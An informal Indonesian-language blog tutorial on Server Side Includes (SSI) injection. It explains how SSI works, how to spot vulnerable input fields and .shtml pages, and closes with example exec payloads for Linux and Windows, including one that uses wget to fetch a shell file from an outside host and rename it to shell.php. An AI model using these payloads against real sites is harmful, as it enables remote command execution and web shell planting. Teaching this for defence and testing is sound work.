Assalamualaikum guyss, welcome back to my blog:v. Oke langsung ae kali ini mimin bakal share materi tentang SERVER SIDE INCLUDES atau juga di sebut SSI. Jadi gasken ae

    Apa Itu Server Side Includes?

    SSI adalah arahan yang ada pada aplikasi Web yang digunakan untuk memberi makan halaman HTML dengan konten dinamis. Ini seperti CGI tapi SSI digunakan untuk menjalankan beberapa tindakan sebelum halaman di muat. Untuk melakunya server web menganalisis SSI sebelum memberikam halaman pada pengguna. 

    Serangan Server Side Includes mengeskploitasi website dengan menyuntikan script di html atau mengeksekusi kode arbitrer (atau kalian biasanya mengenalnya dengan RCE). Itu dapat dieksploitasi melalui manipulasi SSI yang digunakan dalam aplikasi atau memaksa penggunaannya melalui bidang input pengguna (Login Form, Search, Atau input lainya).

Untuk memeriksa apakah aplikasi memvalidasi data bidang input dengan benar dengan memasukkan karakter yang digunakan dalam arahan SSI, seperti:

< ! # = / . " - > and [a-zA-Z0-9] 

    Cara lain untuk mengetahui apakah website rentan SSI adalah dengan memverivikasi halaman website dengan ekstensi shtml, shtm, stm. Namun kurangnya jenis halaman ini tidak berarti kalau website ini terlindungi dari serangan SSI.

    Bagaimanapun, serangan akan berhasil jika server mengijinkan eksekusi SSI tanpa validasi yang tepat Hal ini dapat menyebabkan akses dan manipulasi sistem file dan proses di bawah izin dari pemilik proses server web.

    Penyerang dapat mengakses informasi sensitif, seperti file kata sandi, dan menjalankan perintah shell. Arahan SSI disuntikkan di bidang input dan dikirim ke server web. Server web mem-parsing dan mengeksekusi arahan sebelum memasok halaman. Kemudian, hasil serangan akan dapat dilihat saat berikutnya halaman dimuat untuk browser pengguna.

    Contoh :

    Perintah yang digunakan untuk menyuntikkan SSI bervariasi sesuai dengan sistem operasional server yang digunakan. Perintah berikut mewakili sintaks yang harus digunakan untuk menjalankan perintah OS.

Linux:

List files of directory:

<!--#exec cmd="ls" -->

Access directories:

<!--#exec cmd="cd /root/dir/">

Execution script:

<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->

Windows:

List files of directory:

<!--#exec cmd="dir" -->

Access directories:

<!--#exec cmd="cd C:\admin\dir">

DLL:v sebernernya sintaks yang di gunakan untuk serangan SSI sangat banyak, seperti sintaks yang biasanya kalian gunakan pada Remote Code Execution (RCE).

Oke lah sekian dulu materi dari mimin kurang lebihnya mohon maaf, Wassalamualikum...